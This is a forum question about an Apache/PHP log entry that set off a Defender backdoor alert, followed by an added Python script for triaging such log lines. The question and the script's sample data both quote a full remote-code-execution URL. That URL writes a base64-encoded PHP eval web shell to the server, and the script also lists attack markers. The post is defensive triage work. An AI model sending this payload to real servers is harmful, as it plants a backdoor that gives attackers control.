Score:0

Apache 2.4.51 URL Defence

id flag

I am running Apache 2.4.51 with PHP 8.1.0 on a Windows 10 PC. Recently, I noticed some entries in my log and corresponding alerts from Windows Defender. An example culprit causing an AV alert is https://jacobsm.com/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); which gives a 200 code in response, and an alert from Windows Defender of Backdoor:PHP/Remoteshell.B. Defender also states that the Status is failed and that it may not have been fully remediated. The file affected is the Apache log file, so it can't quarantine it because it is in use by Apache. I suspect it is worried that the file may be interpreted by the PHP processor (although it never will be). Should I be concerned?

in flag
Yes, you should. Either your Windows PC is exposed directly to the internet, or you have malware roaming in your LAN. Both are issues that should be addressed.
id flag
Okay, I have removed PHP from the stack, and use alternative techniques to obtain what I was getting with PHP. I should be safe now with just Apache 2.4.51 running, surely?!?
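For triaging log entries like the one quoted in the question, here is an added example (not code from the original post or from any commenter) that scans Apache access-log lines for the markers in that request and decodes its `base64_decode()` arguments, so you know which file name to look for on disk. The marker list, function names and sample log lines are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# host ident user [time] "METHOD target PROTO" status size (common/combined log format)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) ')
# Markers taken from the request quoted in the question.
MARKERS = ("invokefunction", "call_user_func_array", "base64_decode(", "eval(", "fopen(")
B64_ARG = re.compile(r"base64_decode\(([A-Za-z0-9+/=]+)\)")


def decode_b64_args(target):
    """Decode unpadded base64 literals passed to base64_decode() in the URL."""
    decoded = []
    for raw in B64_ARG.findall(target):
        try:
            data = base64.b64decode(raw + "=" * (-len(raw) % 4))
            decoded.append(data.decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable>")
    return decoded


def triage(lines):
    """Return one finding per log line whose request target carries a marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, when, method, target, status = m.groups()
        target = unquote(target)
        hits = [k for k in MARKERS if k in target.lower()]
        if hits:
            findings.append({"host": host, "time": when, "status": int(status),
                             "markers": hits, "decoded": decode_b64_args(target)})
    return findings


# Constructed sample lines: addresses, timestamps and sizes are made up; the
# first request target is the one quoted in the question.
SAMPLE = [
    r'203.0.113.7 - - [01/Jan/2022:04:12:33 +0000] "GET /?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); HTTP/1.1" 200 5120',
    r'198.51.100.4 - - [01/Jan/2022:04:13:01 +0000] "GET /index.html HTTP/1.1" 200 1043',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f["host"], f["status"], f["markers"], f["decoded"][:1])
```

The first decoded value is the file name the request tries to create, so checking the document root for that file is a quick way to tell a failed probe from a successful write. The status code only records what Apache served for the path, not whether the query string was executed.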